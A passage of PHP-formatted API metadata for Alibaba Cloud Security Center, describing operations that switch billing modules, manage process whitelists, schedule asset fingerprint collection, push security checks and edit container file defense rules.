'[{"type":"json","example":"{\\n \\"RequestId\\": \\"DFE4F166-1AC9-4FAC-A4E4-F0608AD705A6\\"\\n}","errorExample":""},{"type":"xml","example":"\\n DFE4F166-1AC9-4FAC-A4E4-F0608AD705A6\\n","errorExample":""}]', ], 'ModifyPostPayModuleSwitch' => [ 'summary' => 'Enables or disables pay-as-you-go billing for a specified feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'paid', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'PostPayInstanceId', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The pay-as-you-go instance ID. This parameter is required.'."\n" ."\n" .'> Invoke the [DescribeVersionConfig](~~DescribeVersionConfig~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'postpay-sas-**', 'title' => ''], ], [ 'name' => 'PostPayModuleSwitch', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The switch status of pay-as-you-go modules in JSON string format. Valid values:'."\n" .'- Key:'."\n" .' - **VUL**: vulnerability fix module'."\n" .' - **CSPM**: Cloud Security Posture Management (CSPM) module'."\n" .' - **AGENTLESS**: agentless detection module'."\n" .' - **SERVERLESS**: serverless security module'."\n" .' - **CTDR**: threat detection and response module'."\n" .' - **POST_HOST**: host and container security module'."\n" .' - **SDK**: malicious file detection SDK module'."\n" .' - **RASP**: application protection module'."\n" .' - **CTDR_STORAGE**: log management module'."\n" .' - **ANTI_RANSOMWARE**: anti-ransomware management'."\n" .'- Value: 0 indicates disabled. 1 indicates enabled.'."\n" ."\n" .'> Modules for which no value is specified remain unchanged.'."\n" ."\n" .'This parameter has the same meaning as PostPayModuleSwitchObj. If both parameters are specified, the value of PostPayModuleSwitch takes precedence.>', 'type' => 'string', 'required' => false, 'example' => '{"VUL":1,"CSPM":0}'], ], [ 'name' => 'PostPaidHostAutoBind', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to automatically bind newly added assets for host and container protection. Valid values:'."\n" ."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], ], [ 'name' => 'PostPaidHostAutoBindVersion', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The version to which newly added assets are automatically bound for host and container protection. Valid values:'."\n" .'- **1**: Free Edition. '."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Advanced Edition.'."\n" .'- **6**: Anti-virus Edition. '."\n" .'- **7**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3'], ], [ 'name' => 'PostPayModuleSwitchObj', 'in' => 'query', 'style' => 'json', 'schema' => [ 'title' => '', 'description' => 'The pay-as-you-go module switch.'."\n" .'>This parameter has the same meaning as PostPayModuleSwitch. If both parameters are specified, the value of PostPayModuleSwitch takes precedence.>', 'type' => 'object', 'properties' => [ 'Vul' => ['title' => '', 'description' => 'The vulnerability fix module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'Cspm' => ['title' => '', 'description' => 'The cloud security configuration check module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'Agentless' => ['title' => '', 'description' => 'The agentless detection module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'Serverless' => ['title' => '', 'description' => 'The serverless security module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'Ctdr' => ['title' => '', 'description' => 'The threat detection and response module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'CtdrStorage' => ['title' => '', 'description' => 'The log management module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'Sdk' => ['title' => '', 'description' => 'The malicious file detection SDK module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'Rasp' => ['title' => '', 'description' => 'The application protection module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'PostHost' => ['title' => '', 'description' => 'The host and container security module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'WebLock' => ['title' => '', 'description' => 'The file tamper-proofing module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'AntiRansomware' => ['title' => '', 'description' => 'The anti-ransomware module. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'BasicService' => ['title' => '', 'description' => 'The basic service module. Valid values:'."\n" .'- **0**: Shutdown.'."\n" .'- **1**: Enabling status.'."\n" ."\n" .'>The basic service module switch cannot be manually modified. This module is in the enabling status when any other module is enabled, and is in the shutdown state only when all other modules are in the shutdown state.>', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], 'AiDigital' => ['title' => '', 'description' => 'The AI digital human module.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'required' => false], ], 'required' => false, 'example' => '', ], ], [ 'name' => 'EdrModuleSwitch', 'in' => 'query', 'style' => 'json', 'schema' => [ 'type' => 'object', 'properties' => [ 'EDR_HOST_USAGE' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BREF20', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'PostPayInstanceNotExist', 'errorMessage' => 'post pay instance not exist.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify pay-as-you-go feature status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyPostPayModuleSwitch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BREF20\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ModifyProcessWhiteList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '92380', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains this value.', 'type' => 'string', 'required' => false, 'example' => '173.128.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy.'."\n" .'> You can call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'Md5s', 'in' => 'query', 'schema' => ['description' => 'The MD5 hash of the process startup file.'."\n" .'> You can call the [DescribeWhiteListProcess](~~DescribeWhiteListProcess~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '001d7f68c3b44147988f0dc81192****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The whitelist status of the process. Valid values:'."\n" .'- **1**: Remove from the whitelist.'."\n" .'- **2**: Add to the whitelist.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '11C96623-E106-59C9-866D-A6C82911****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ['errorCode' => 'StrategyStatusError', 'errorMessage' => 'The strategy status does not support this operation.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify process whitelist status', 'summary' => 'Adds processes to or removes processes from the whitelist in the application whitelist feature.', 'description' => 'The application whitelist is a China-site public preview feature that is no longer open for new applications. Users who have already applied for or are using this feature can call this operation as expected.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:ModifyProcessWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"11C96623-E106-59C9-866D-A6C82911****\\"\\n}","type":"json"}]', ], 'ModifyPropertyScheduleConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92381', 'abilityTreeNodes' => ['FEATUREsasGC725T'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the asset fingerprints for which you want to modify the collection frequency. Valid values:'."\n" ."\n" .'* **scheduler_port_period**: listening port'."\n" .'* **scheduler_process_period**: running process'."\n" .'* **scheduler_account_period**: account'."\n" .'* **scheduler_software_period**: software'."\n" .'* **scheduler_cron_period**: scheduled task'."\n" .'* **scheduler_sca_period**: middleware, database, or web service'."\n" .'* **scheduler_autorun_period**: startup item'."\n" .'* **scheduler_lkm_period**: kernel module'."\n" .'* **scheduler_sca_proxy_period**: website'."\n", 'type' => 'string', 'required' => true, 'example' => 'scheduler_port_period', 'title' => ''], ], [ 'name' => 'ScheduleTime', 'in' => 'query', 'schema' => ['description' => 'The new collection frequency of asset fingerprints. Valid values:'."\n" ."\n" .'* **0**: disabled, which indicates that the asset fingerprints are not automatically or periodically collected.'."\n" .'* **1**: collects asset fingerprints once an hour.'."\n" .'* **3**: collects asset fingerprints once every 3 hours.'."\n" .'* **12**: collects asset fingerprints once every 12 hours.'."\n" .'* **24**: collects asset fingerprints once a day.'."\n" .'* **168**: collects asset fingerprints once every 7 days.'."\n", 'type' => 'string', 'required' => true, 'example' => '3', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'ModifyResult' => ['description' => 'Indicates whether the collection frequency of asset fingerprints is modified. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'C0D1DF51-D879-55A8-B6C7-7D3B913EF34D', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyPropertyScheduleConfig', 'summary' => 'Modifies the collection frequency of asset fingerprints for an automatic periodic collection task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyPropertyScheduleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyPropertyScheduleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"ModifyResult\\": true,\\n \\"RequestId\\": \\"C0D1DF51-D879-55A8-B6C7-7D3B913EF34D\\"\\n}","errorExample":""},{"type":"xml","example":"\\n true\\n C0D1DF51-D879-55A8-B6C7-7D3B913EF34D\\n","errorExample":""}]', ], 'ModifyPushAllTask' => [ 'summary' => 'Sends a security check task to asset servers with one click.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92382', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers on which you want to perform security checks. Separate multiple UUIDs with commas (,).', 'type' => 'string', 'required' => true, 'example' => 'inet-923b4538-0e88-409d-80ba-cb2e7487****,dc1691eb-656f-472f-b2aa-04f621f4****,70452f92-9fc1-45c5-ab35-e7bf8552****', 'title' => ''], ], [ 'name' => 'Tasks', 'in' => 'query', 'schema' => ['description' => 'The check items to include in the security check. Separate multiple check items with commas (,). Valid values:'."\n" .'- **OVAL_ENTITY**: CVE vulnerabilities'."\n" .'- **CMS**: Web-CMS vulnerabilities'."\n" .'- **SYSVUL**: system vulnerabilities'."\n" .'- **SCA**: application vulnerabilities'."\n" .'- **HEALTH_CHECK**: baselines'."\n" .'- **WEBSHELL**: web shells'."\n" .'- **PROC_SNAPSHOT**: processes'."\n" .'- **PORT_SNAPSHOT**: ports'."\n" .'- **ACCOUNT_SNAPSHOT**: accounts'."\n" .'- **SOFTWARE_SNAPSHOT**: software'."\n" .'- **SCA_SNAPSHOT**: middleware, databases, and web services'."\n" .'- **CROND_SNAPSHOT**: scheduled tasks'."\n" .'- **AUTORUN_SNAPSHOT**: startup items'."\n" .'- **LKM_SNAPSHOT**: kernel modules'."\n" .'- **SCA_PROXY_SNAPSHOT**: websites.', 'type' => 'string', 'required' => true, 'example' => 'HEALTH_CHECK,OVAL_ENTITY', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '91EB4AC7-7FEF-4C72-BE49-4414E459AEC2', 'title' => ''], 'PushTaskRsp' => [ 'description' => 'The result of the security check task execution.', 'type' => 'object', 'properties' => [ 'PushTaskResultList' => [ 'description' => 'The information about the servers on which the security check task failed.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '5493fe42-61f5-4627-9aa2-8c449bbe****', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group.', 'type' => 'integer', 'format' => 'int64', 'example' => '226', 'title' => ''], 'Success' => ['description' => 'Indicates whether the security check was successful. Valid values:'."\n" ."\n" .'- **true**: The security check was successful.'."\n" .'- **false**: The security check failed.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'Region' => ['description' => 'The region where the server is located.', 'type' => 'string', 'example' => 'cn-beijing', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'TestInstance', 'title' => ''], 'Online' => ['description' => 'Indicates whether the Security Center agent is online. Valid values:'."\n" ."\n" .'- **true**: The agent is online.'."\n" .'- **false**: The agent is offline.'."\n" ."\n" .'> If the agent is offline, Security Center cannot provide security protection for the server.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'Message' => ['description' => 'The details about the security check task failure.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Ip' => ['description' => 'The IP address of the server.', 'type' => 'string', 'example' => '127.136.XX.XX', 'title' => ''], 'OsVersion' => ['description' => 'The operating system version of the server.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'i-wz9f7wlklxqnvdk****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'PushTaskError', 'errorMessage' => 'Failed to push task.', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'FreeVersionNotPermit', 'errorMessage' => 'Free version is not permitted.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Send a security check task with one click', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyPushAllTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyPushAllTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"91EB4AC7-7FEF-4C72-BE49-4414E459AEC2\\",\\n \\"PushTaskRsp\\": {\\n \\"PushTaskResultList\\": [\\n {\\n \\"Uuid\\": \\"5493fe42-61f5-4627-9aa2-8c449bbe****\\",\\n \\"GroupId\\": 226,\\n \\"Success\\": false,\\n \\"Region\\": \\"cn-beijing\\",\\n \\"InstanceName\\": \\"TestInstance\\",\\n \\"Online\\": false,\\n \\"Message\\": \\"successful\\",\\n \\"Ip\\": \\"127.136.XX.XX\\",\\n \\"OsVersion\\": \\"linux\\",\\n \\"InstanceId\\": \\"i-wz9f7wlklxqnvdk****\\"\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'ModifyRefreshProcessInfo' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => '0f3b8f76-90e5-4455-a5aa-23ce30b5****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '814FCBBC-3A02-5555-8D05-F8D9FD62A295', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyRefreshProcessInfo', 'summary' => 'Refreshes the list of processes that are associated with a Linux software vulnerability.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyRefreshProcessInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ModifyRefreshProcessInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"814FCBBC-3A02-5555-8D05-F8D9FD62A295\\"\\n}","type":"json"}]', ], 'ModifySasContainerWebDefenseRule' => [ 'summary' => 'Modifies a container file defense rule.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '200634', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'wwwwwww', 'title' => ''], ], [ 'name' => 'PathConfDTOList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of defense paths for the rule.', 'type' => 'array', 'items' => [ 'description' => 'The list of defense paths for the rule.', 'type' => 'object', 'properties' => [ 'DefensePath' => ['description' => 'The defense path.', 'type' => 'string', 'required' => true, 'example' => '/test/home/', 'title' => ''], 'BackupPath' => ['description' => 'The backup path.', 'type' => 'string', 'required' => false, 'example' => '/tmp/test', 'title' => ''], 'ExcludeFilePath' => ['description' => 'The excluded file path.', 'type' => 'string', 'required' => false, 'example' => '/test/home/qq', 'title' => ''], 'ExcludeFileType' => ['description' => 'The excluded file type.', 'type' => 'string', 'required' => false, 'example' => 'php', 'title' => ''], 'ExcludeFile' => ['description' => 'The excluded file.', 'type' => 'string', 'required' => false, 'example' => '/usr/test', 'title' => ''], 'GuardType' => ['description' => 'The Defense mode. Valid values:'."\n" .'- **0**: Basic pattern (whitelist). '."\n" .'- **1**: Complex pattern (blacklist).', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], 'IncludeFileType' => ['description' => 'The included file type.', 'type' => 'string', 'required' => false, 'example' => 'jsp', 'title' => ''], 'IncludeFile' => ['description' => 'The included file.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/test', 'title' => ''], 'DefenseMode' => ['description' => 'The action to perform. Valid values:'."\n" .'- **block**: Block.'."\n" .'- **audit**: Alert.', 'type' => 'string', 'required' => true, 'example' => 'audit', 'title' => ''], 'ProcessPathList' => [ 'description' => 'The list of whitelisted processes.', 'type' => 'array', 'items' => ['description' => 'The list of whitelisted processes.', 'type' => 'string', 'required' => false, 'example' => '/bin/bash', 'title' => ''], 'required' => false, 'maxItems' => 10, 'minItems' => 1, 'title' => '', 'example' => '', ], 'PathConfId' => ['description' => 'The path ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '12345678', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A447E4E3-42A3-58B7-A7D4-2287745BEFDC', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Modify a container file defense rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySasContainerWebDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifySasContainerWebDefenseRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A447E4E3-42A3-58B7-A7D4-2287745BEFDC\\"\\n}","type":"json"}]', ], 'ModifySearchCondition' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92388', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains the value.', 'type' => 'string', 'required' => false, 'example' => '27.223.XX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the common filter condition.', 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], [ 'name' => 'FilterConditions', 'in' => 'query', 'schema' => ['description' => 'The filter conditions. This parameter is in JSON format. Pay attention to the letter case when you specify this parameter. The following fields are included:'."\n" ."\n" .'- **filterParams**: The filter parameters. This parameter is in JSON format. The following fields are included:'."\n" .' - **label**: The display name for the search in the console.'."\n" .' - **value**: The filter parameter condition. This parameter is in JSON format. The following fields are included:'."\n" ."\n" .' - **name**: The filter condition field. For more information about the valid values of this field, see the description below.'."\n" .' - **value**: The value that corresponds to the filter condition field.'."\n" ."\n" .'- **LogicalExp**: The logical relationship between multiple filter conditions. Valid values:'."\n" .' - **OR**: or'."\n" .' - **AND**: and'."\n" .'> Valid values of **name**:'."\n" .'> - If **Type** is set to **ecs**, call the [DescribeCriteria](~~DescribeCriteria~~) operation to query the supported search conditions.'."\n" .'> - If **Type** is set to **cloud_product**, call the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) operation to query the supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '{'."\n" .' "filterParams": ['."\n" .' {'."\n" .' "label": "UUID:xxx",'."\n" .' "value": "{\\"name\\":\\"uuidList\\",\\"value\\":\\"xxx\\"}"'."\n" .' }'."\n" .' ],'."\n" .' "LogicalExp": "OR"'."\n" .'}', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The asset type. Default value: **ecs**. Valid values:'."\n" .'- **ecs**: host asset'."\n" .'- **cloud_product**: cloud service.', 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '9DFFCF83-4F7B-5E05-B82D-3B619D5****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 